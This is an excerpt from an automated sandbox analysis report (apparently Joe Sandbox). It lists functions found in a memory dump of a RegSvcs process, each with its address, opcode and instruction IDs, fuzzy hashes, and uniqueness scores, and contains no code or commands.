                            • Instruction ID: ee03cfc0a7a05e5154668bd50c525878535c95d6ad8a8e594c5ed3abe41da33e
                            • Opcode Fuzzy Hash: ab6fbd338bfce686481bec994c8440fc9b547fbabfa29ef7859d9b9c18d23fba
                            • Instruction Fuzzy Hash: 3B21A431B202269FEF14DF69C955BAE7BF5BF88714F108065E505EB3A4DAB19C40CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229160 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 57a97f655dcbb2d6d3baedfa7859b24a3078640d97ef6ad167fe40dbb26c31d8
                            • Instruction ID: 519279069a67046c373aa204b42f49be0762a0f755189b1150ea781e4c29dcd4
                            • Opcode Fuzzy Hash: 57a97f655dcbb2d6d3baedfa7859b24a3078640d97ef6ad167fe40dbb26c31d8
                            • Instruction Fuzzy Hash: C721D730E1022A9BCF09CFA9C4545DEF7B2AF89304F20861AED15FB340DBB09886CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221888 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c0b3798707e5f72d5cadc13cd12fc98b72181edbf5b419c592c0a2033cdc151
                            • Instruction ID: ab97cb44478c102663fd8e3554cacee5fde9600ed0ea43a30b84115000a463f6
                            • Opcode Fuzzy Hash: 5c0b3798707e5f72d5cadc13cd12fc98b72181edbf5b419c592c0a2033cdc151
                            • Instruction Fuzzy Hash: 5F215E30B102669FDB24EB78C554AAE77F2AF49204F200478D605EB364DF3ADD50CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012217C0 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d4321731006a1bc912bddfb9fcf73ea89f9b1c14c3a095cdc4288c1591099622
                            • Instruction ID: 96a4c2fba9453afdc099db28cb51afd65b3a7131e3396f9cd1c7714906aaf01a
                            • Opcode Fuzzy Hash: d4321731006a1bc912bddfb9fcf73ea89f9b1c14c3a095cdc4288c1591099622
                            • Instruction Fuzzy Hash: B8110631F01222ABDB216FBD9848A6E7BA5AB89660F100975DA09D3340EB34D85287C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012216B0 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c32f59e78e61147726748569464695d933972396302ce65b4516ff39583a890
                            • Instruction ID: 3c003c37a3a33ed6afda05000de1f6c0e6187fd3d82418d978572bd791c9897b
                            • Opcode Fuzzy Hash: 1c32f59e78e61147726748569464695d933972396302ce65b4516ff39583a890
                            • Instruction Fuzzy Hash: 07218434610122AFDF27EB6DF844F1D375AEB45308F104A25D105C72AADB39DC96CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01224F98 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36f6335fd71931f4f9c6486daf4ef9eb72a52a532f2beb72e41b05848c260fb9
                            • Instruction ID: 473c02abc15f84edb08bc05fbb17f6acc910995cba246c14b630f6230e867c46
                            • Opcode Fuzzy Hash: 36f6335fd71931f4f9c6486daf4ef9eb72a52a532f2beb72e41b05848c260fb9
                            • Instruction Fuzzy Hash: 25214830B10225DFCB14EB79C958AAD77F1AF8D304F204468E506EB3A4DB3A9D05CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221488 Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: feaf0811755fe09e3e2a5e7a89bce21e80001553ed497ec20c5cb274f954264a
                            • Instruction ID: e603511e593b1203585a2cd76c113de4a51ed6e0897eb241a77cba1accdee4a4
                            • Opcode Fuzzy Hash: feaf0811755fe09e3e2a5e7a89bce21e80001553ed497ec20c5cb274f954264a
                            • Instruction Fuzzy Hash: DD11B631A20266ABCF21EFBC94406BD7BE5EB48210F1400B6E909EB201EA35D951C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01220838 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1ac1bc8892976e4f7122a6c4617c67f481e19afce6423786d58f92d30a08080d
                            • Instruction ID: 4a22eed2a398682161eb0b6b12f6b72a7f5f18f147043850dd4d3be0b94cdd46
                            • Opcode Fuzzy Hash: 1ac1bc8892976e4f7122a6c4617c67f481e19afce6423786d58f92d30a08080d
                            • Instruction Fuzzy Hash: 8A112B30B20321AFEF265A7DA4003BF7755EF41214F10497AF506DF256D5A5CC848BC6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0107D006 Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3274567834.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_107d000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4405460ae52a293c97faf1d4fc2adb2248620e9783e3a8543f375a8687f46e17
                            • Instruction ID: 9098359b5d9d2b8aaa30f2e2ac662886be6ee29c8dbc5f4a1f9c2297eec3ffc5
                            • Opcode Fuzzy Hash: 4405460ae52a293c97faf1d4fc2adb2248620e9783e3a8543f375a8687f46e17
                            • Instruction Fuzzy Hash: 272165755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01220848 Relevance: .1, Instructions: 62COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e53b7f770c3f16fd3365bf763b520086934cbed3b4dbc62ae35a01879684c211
                            • Instruction ID: cabd76a61680e06206a492e3e1211377f5a22478ada5ed4de36b1cb0089662ea
                            • Opcode Fuzzy Hash: e53b7f770c3f16fd3365bf763b520086934cbed3b4dbc62ae35a01879684c211
                            • Instruction Fuzzy Hash: 9211C430B20225AFEF655A7DE40472F7695EF45214F104939F206CF366DAA5CC858BC6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221498 Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8b6e6af99665dc5ab94deccc9e93eaaf794769bc9836e94d42cb0ddee069a2fa
                            • Instruction ID: 5009e2a518d37212a7af956b66711be444b8ff24a9a098814228d579c1edf847
                            • Opcode Fuzzy Hash: 8b6e6af99665dc5ab94deccc9e93eaaf794769bc9836e94d42cb0ddee069a2fa
                            • Instruction Fuzzy Hash: 7E018431E11226AFCF21EFBC94505AD7BF5EF48210B140479E905E7301EB35D951CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229898 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81eeb14a292464348732a14587f90ef882db2e548d03e76ab7ef2606da59b9f4
                            • Instruction ID: dbb6b0a4b1f12833fddb3262a2c9441c6b84f3d76f798d8de58a2bc9328335fb
                            • Opcode Fuzzy Hash: 81eeb14a292464348732a14587f90ef882db2e548d03e76ab7ef2606da59b9f4
                            • Instruction Fuzzy Hash: 05019630A101058BDB04EF59D98478ABBA9FF84310F548174C94C5F299D770E945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012280F0 Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c972becd74373039c7bf1d8d231c1f06651eac12f0a11ae35c23dbd0ba7e223
                            • Instruction ID: c909930124fb3cd915e12010791cbea9841243e1bf960531080898b1bc769d51
                            • Opcode Fuzzy Hash: 0c972becd74373039c7bf1d8d231c1f06651eac12f0a11ae35c23dbd0ba7e223
                            • Instruction Fuzzy Hash: 050140349101199FCB06EFA8E9949CC7BB5EF41318F5042A9C4049F2A9DB326E4AC781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221524 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e03bd86abe95087be4a7854fb76740e7e7b9cc6fafc8a9528deccf71397956ed
                            • Instruction ID: e7c06c92fbb5f252ae629daabe47ef9401b2790a453496d0ab002c1b386a69b0
                            • Opcode Fuzzy Hash: e03bd86abe95087be4a7854fb76740e7e7b9cc6fafc8a9528deccf71397956ed
                            • Instruction Fuzzy Hash: 74F02B37A24171EFD7228BA894919AC7F60EE6822171C00D7D906DB351D635D422D751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01227090 Relevance: .0, Instructions: 34COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c4cb7bf5c9d6ada18d15ffe1d562a486b7b3d806edf0f602bbb22eb75a1e0e5
                            • Instruction ID: 6106c5f62f20ec3042c983650177e48c4d544b9c1feb41e0f96678d53b3d6ef1
                            • Opcode Fuzzy Hash: 1c4cb7bf5c9d6ada18d15ffe1d562a486b7b3d806edf0f602bbb22eb75a1e0e5
                            • Instruction Fuzzy Hash: 53F0E739B40618CFC714EB74D598B6D77B2EF88329F1444A8E60ADB3A4CB35AD42CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01228100 Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7415c2b4837b1a4e023d53473178739c903e080ba309ec58c532972349f618dc
                            • Instruction ID: fd8d56f8aa80d253a04ff20a663fa635339ce4bb87c23db4e7e298ab1755082b
                            • Opcode Fuzzy Hash: 7415c2b4837b1a4e023d53473178739c903e080ba309ec58c532972349f618dc
                            • Instruction Fuzzy Hash: 12F06D349001099FCB05EFB4F99498C7BBAEF40308F504279C0089B268DF326E49CB81
                            Uniqueness

                            Uniqueness Score: -1.00%